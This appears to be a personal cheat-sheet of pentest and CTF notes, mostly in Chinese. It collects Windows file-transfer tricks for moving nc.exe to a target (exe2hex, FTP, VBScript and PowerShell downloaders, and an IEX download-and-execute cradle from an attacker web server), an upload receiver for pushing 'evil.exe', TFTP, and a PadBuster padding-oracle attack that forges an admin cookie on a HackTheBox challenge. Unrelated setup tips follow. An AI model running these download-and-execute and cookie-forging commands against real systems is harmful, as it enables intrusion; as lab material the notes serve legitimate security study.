
windows shell 中文乱码

REM Switch the current console to code page 65001 (UTF-8) so Chinese text stops
REM rendering as mojibake. Affects only this console session.
chcp 65001

upx && exe2hex 传输文件

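# Pack nc.exe and turn it into a text blob that can be pasted into a Windows shell.
# upx -9: maximum compression; rewrites nc.exe in place, so keep a copy of the original.
# NOTE(review): UPX-packed binaries are commonly flagged by AV/EDR — expect detection.
upx -9 nc.exe
# exe2hex: -x is the input executable, -p writes a .cmd that rebuilds the binary
# on the target with PowerShell.
exe2hex -x nc.exe -p nc.cmd
# Put the generated .cmd on the X clipboard. Redirect the file in directly instead
# of piping it through cat.
xclip -selection clipboard < nc.cmd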

ftp 传输文件

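REM Build an ftp command script so the transfer runs unattended, then feed it to the
REM Windows ftp client: -n suppresses auto-login (USER/password come from the script),
REM -s: reads commands from the file, -v suppresses the remote server's responses
REM (Windows ftp.exe semantics, the opposite of Unix ftp -v).
REM NOTE: FTP sends the credentials and the file in clear text.
echo open 192.168.0.2 21> ftp.txt
echo USER d2x3>> ftp.txt
REM the line following USER is sent as the password
echo passwd>> ftp.txt
REM binary mode; ASCII mode would corrupt the executable
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
REM "bye" closes the session and exits ftp. The original wrote "byte", which ftp
REM rejects as an unknown command, so the client can be left sitting at its prompt.
echo bye >> ftp.txt

ftp -v -n -s:ftp.txt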

vbs 传输文件

REM Write a small VBScript downloader (wget.vbs) line by line with echo, then run it
REM with cscript. Usage: cscript wget.vbs <URL> <save-as>
REM NOTE: the script deletes an existing <save-as> before writing (silent overwrite),
REM and over plain http:// the downloaded bytes are not authenticated in transit.
echo URL = WScript.Arguments(0)> wget.vbs
echo saveTo = WScript.Arguments(1)>> wget.vbs
REM ServerXMLHTTP performs the synchronous GET (third argument false = not async)
echo Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")>> wget.vbs
echo objXMLHTTP.open "GET", URL, false>> wget.vbs
echo objXMLHTTP.send()>> wget.vbs
REM only write the file on HTTP 200; any other status silently saves nothing
echo If objXMLHTTP.Status = 200 Then>> wget.vbs
echo Set objADOStream = CreateObject("ADODB.Stream")>> wget.vbs
echo objADOStream.Open>> wget.vbs
REM Type = 1 is adTypeBinary, so the response body is written byte for byte
echo objADOStream.Type = 1 >> wget.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody>> wget.vbs
echo objADOStream.Position = 0>> wget.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject")>> wget.vbs
REM remove any existing target first so SaveToFile does not fail on an existing file
echo If objFSO.Fileexists(saveTo) Then objFSO.DeleteFile saveTo>> wget.vbs
echo Set objFSO = Nothing>> wget.vbs
echo objADOStream.SaveToFile saveTo>> wget.vbs
echo objADOStream.Close>> wget.vbs
echo Set objADOStream = Nothing>> wget.vbs
echo End if>> wget.vbs
echo Set objXMLHTTP = Nothing>> wget.vbs
echo WScript.Quit>> wget.vbs

REM fetch nc.exe from the attacker's web server into the current directory
cscript wget.vbs http://192.168.31.80:8000/nc.exe nc.exe

powershell 传输文件

REM Generate wget.ps1 (a WebClient.DownloadFile call) with echo, then run it.
REM -ExecutionPolicy Bypass lets the unsigned script run; -NoProfile/-NonInteractive
REM keep the run quiet and free of profile side effects.
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://192.168.31.80:8000/nc.exe" >>wget.ps1
REM NOTE(review): $file is relative; .NET resolves it against the process working
REM directory, which can differ from PowerShell's current location — a full path is safer.
echo $file = "nc.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

#一句话
REM One-liner download. ServerCertificateValidationCallback={$true} disables TLS
REM certificate checking for this PowerShell process: it is a no-op for the http://
REM URL used here, and over https:// it removes the only protection against a
REM tampered download — drop it unless the server really uses a self-signed cert.
REM The """ sequences pass a literal " through cmd's -command "..." string.
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://192.168.31.80:8000/nc.exe"""; $destination="""nc.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);"

#一句话2
REM Shortest form. Note the file is saved as 'ncccc.exe' here, not nc.exe as above.
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.31.80:8000/nc.exe', 'ncccc.exe')

powershell 执行脚本

REM Download-and-execute in memory: IEX runs the fetched text without writing it to disk.
REM Over plain http:// anyone on the network path can swap helloworld.ps1 and get code
REM execution on this host — use https:// (or verify a hash) when the network is not yours.
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.31.80:8000/helloworld.ps1')

php 传输文件

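<?php
// Minimal upload receiver for the WebClient.UploadFile() one-liner below: stores the
// multipart "file" field under $uploaddir. By design this is an unauthenticated
// arbitrary-file-write endpoint — run it only on a listener you control and remove it
// when the transfer is done.
$uploaddir = '/var/www/uploads/';
if (!isset($_FILES['file'])) {
    http_response_code(400);
    exit;
}
// basename() strips any directory part of the client-supplied name so the file can
// never be written outside $uploaddir (defensive; do not rely on PHP doing it).
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
// move_uploaded_file() returns false on failure (bad tmp_name, unwritable dir); surface
// it instead of silently answering 200. Original also lacked the trailing semicolon.
if (!move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
    http_response_code(500);
}
?>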
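REM Push evil.exe to the receiver above. WebClient.UploadFile POSTs the file as a
REM multipart form field named "file", which is what upload.php reads from $_FILES.
REM The original line was missing the closing quote after evil.exe.
powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.31.80/upload.php', 'evil.exe')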

tftp 传输文件

#server
# Stand up a TFTP server (atftpd) rooted at /tftp on the attacking box.
sudo apt install atftp
sudo mkdir /tftp
# NOTE(review): giving the directory to 'nobody' is presumably what lets the
# unprivileged daemon write uploads (put) — confirm against atftpd's default user.
sudo chown nobody: /tftp
# TFTP has no authentication: anything under /tftp is readable/writable by anyone
# who can reach UDP/69 — stop the daemon as soon as the transfer is done.
sudo atftpd --daemon --port 69 /tftp

#client
REM Windows tftp.exe: -i selects binary (octet) mode; without it an exe is corrupted
REM by ASCII transfer. NOTE(review): the TFTP client is an optional Windows feature
REM on modern versions — check it is present before relying on it.
tftp -i 192.168.31.80 put stuff.exe

知识点

padding-oracle-decryption-attack

# PadBuster padding-oracle attack: URL, the encrypted sample (the URL-encoded cookie
# value), block size 8 (implies a 64-bit block cipher), and the cookies every request
# must carry so the server decrypts the sample.
# 1) decrypt the iknowmag1k cookie
padbuster http://docker.hackthebox.eu:30461/profile.php RGsT1ajC8r%2FbC7hIlR0zwvjHmyCDpKRMuN%2BnJOMTAFL1pPoeKW3VKw%3D%3D 8 --cookie "iknowmag1k=RGsT1ajC8r%2FbC7hIlR0zwvjHmyCDpKRMuN%2BnJOMTAFL1pPoeKW3VKw%3D%3D;PHPSESSID=sorl5p4mv2msjhonpj552oqia3"

# 2) --plaintext: use the same oracle to *encrypt* a forged value (role=admin) that
#    the server will accept in place of the original cookie.
# NOTE: the PHPSESSID is a live session token; it is only valid while that session
#       exists and should not be reused from notes.
padbuster http://docker.hackthebox.eu:30461/profile.php RGsT1ajC8r%2FbC7hIlR0zwvjHmyCDpKRMuN%2BnJOMTAFL1pPoeKW3VKw%3D%3D 8 --cookie "iknowmag1k=RGsT1ajC8r%2FbC7hIlR0zwvjHmyCDpKRMuN%2BnJOMTAFL1pPoeKW3VKw%3D%3D;PHPSESSID=sorl5p4mv2msjhonpj552oqia3" --plaintext '{"user":"user","role":"admin"}'

https://archive.eclipse.org/eclipse/downloads/drops4/R-4.9-201809060745/download.php?dropFile=swt-4.9-cocoa-macosx-x86_64.zip

# Swap the SWT bundle shipped with the Android SDK "monitor" tool for the one from
# Eclipse 4.9 (swt-4.9-cocoa-macosx-x86_64.zip from the URL above, unpacked in ~/Downloads).
# NOTE(review): verify the archive against the checksum published on archive.eclipse.org
# before dropping a jar into the SDK.
# {Androidsdk path} is a placeholder — substitute your SDK root.
cd {Androidsdk path}/tools/lib/monitor-x86_64/plugins
cp ~/Downloads/swt-4.9-cocoa-macosx-x86_64/swt.jar .
# keep the original bundle as .old so the swap can be reverted
mv org.eclipse.swt.cocoa.macosx.x86_64_3.100.1.v4236b.jar org.eclipse.swt.cocoa.macosx.x86_64_3.100.1.v4236b.jar.old
# the replacement must carry the exact original bundle filename (presumably so the
# plugin loader still resolves it)
mv swt.jar org.eclipse.swt.cocoa.macosx.x86_64_3.100.1.v4236b.jar

问题如下

➜  ida unzip ida7.zip
Archive: ida7.zip
https://www.52pojie.cn
https://down.52pojie.cn/Tools/Disassemblers/
inflating: ReadME.txt
inflating: x64_idapronm_hexarm64m_hexarmm_hexx64m_hexx86m_170914_e723c5648dc3f2f588ab8339ccf62ec0.zip
error: cannot create +ߦ����-���.url
Illegal byte sequence
error: cannot create IDA MacOS Pro 7.0 +ѥ��=-�+�Ԧ-+�+�+�����idb�̩-.zip
Illegal byte sequence

黑苹果

用u盘可以引导
同样安装了clover的hdd看不到引导
已经设置uefi only
解决方法:从U盘引导进clover,利用clover里的uefi shell 安装引导


准备工作

我的手机

有时候从 github 或 gitlab 这类仓库 clone 项目，因为被墙了，又没有配置代理之类的手段，会下不下来

类似这些

remote: Compressing objects: 100% (4455/4455), done.
Timeout, server gitlab.com not responding. MiB | 7.00 KiB/s
fatal: the remote end hung up unexpectedly
fatal: early EOF

而 git clone 时用的是以 .git 结尾的 SSH 链接（走 22 端口，不经过 HTTP 代理），这时就需要在 ~/.ssh/config 里给 ssh 配置代理来访问这个仓库

$ vim ~/.ssh/config
Host gitlab.com
HostName gitlab.com
Port 22
# Tunnel the SSH connection through the local SOCKS proxy on 127.0.0.1:1080.
# -x is the OpenBSD netcat proxy option (SOCKS5 unless -X selects otherwise); the
# traditional netcat and ncat do not accept it (ncat: --proxy 127.0.0.1:1080 --proxy-type socks5).
# -v prints connection details to stderr. The proxy only relays bytes: SSH still
# verifies gitlab.com's host key end to end, so a tampering proxy is detected.
ProxyCommand nc -v -x 127.0.0.1:1080 %h %p